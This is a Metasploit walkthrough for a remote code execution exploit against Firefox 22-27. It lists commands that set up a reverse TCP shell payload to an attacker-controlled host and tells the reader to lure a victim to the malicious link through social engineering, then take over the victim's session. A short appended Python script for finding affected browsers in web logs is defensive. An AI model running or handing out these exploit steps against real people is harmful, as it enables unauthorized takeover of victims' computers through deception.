This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s JavaScript APIs.
Exploit Targets:
Firefox 22-27
Windows XP SP 3
Windows 7
Linux
OSX
Requirements:
Attacker: Kali Linux
Victim PC: Windows 7
Steps:
1. Open a Kali terminal and type:
msfconsole
2. Now type:
use exploit/multi/browser/firefox_webidl_injection
3. msf exploit(firefox_webidl_injection) > set payload firefox/shell_reverse_tcp
4. msf exploit(firefox_webidl_injection) > set lhost 192.168.0.5 (IP of the local host)
5. msf exploit(firefox_webidl_injection) > set srvhost 192.168.0.5
6. msf exploit(firefox_webidl_injection) > set uripath /
7. msf exploit(firefox_webidl_injection) > exploit
8. The URL to give to the victim is http://192.168.0.5:8080/
Send the link to the server to the victim via chat, email or any social engineering technique.
Once the victim opens the link, you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to that session.
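For defenders, the affected range stated above (Firefox 22-27) can be checked against proxy or web server access logs to find hosts that still need a browser update. The script below is an added example, not part of the original post; it assumes combined-format logs, and the function name and sample log lines are constructed for illustration.

```python
import re

# Affected major versions as stated on this page: Firefox 22-27.
AFFECTED_MIN, AFFECTED_MAX = 22, 27

# Combined log format: the client is the first field and the
# User-Agent is the last double-quoted field on the line.
LINE_RE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')
FIREFOX_RE = re.compile(r'\bFirefox/(\d+)')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.168.0.23 - - [10/Mar/2014:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0"',
    '192.168.0.31 - - [10/Mar/2014:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0"',
    '192.168.0.40 - - [10/Mar/2014:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/33.0.1750.146 Safari/537.36"',
    '192.168.0.52 - - [10/Mar/2014:10:03:45 +0000] "GET /a HTTP/1.1" 200 90 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"',
    '192.168.0.23 - - [10/Mar/2014:10:04:00 +0000] "GET /b HTTP/1.1" 200 77 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0"',
    'truncated line without a user agent',
]


def find_affected(lines):
    """Return sorted unique (client, firefox_major) pairs in the affected range."""
    hits = set()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line or not combined format
        client, user_agent = m.groups()
        fx = FIREFOX_RE.search(user_agent)
        if fx and AFFECTED_MIN <= int(fx.group(1)) <= AFFECTED_MAX:
            hits.add((client, int(fx.group(1))))
    return sorted(hits)


if __name__ == "__main__":
    for client, major in find_affected(SAMPLE_LOG):
        print(f"{client}: Firefox {major} is in the affected range, update required")
```

The User-Agent header is supplied by the client, so treat the result as an inventory hint and confirm the installed version on the host itself.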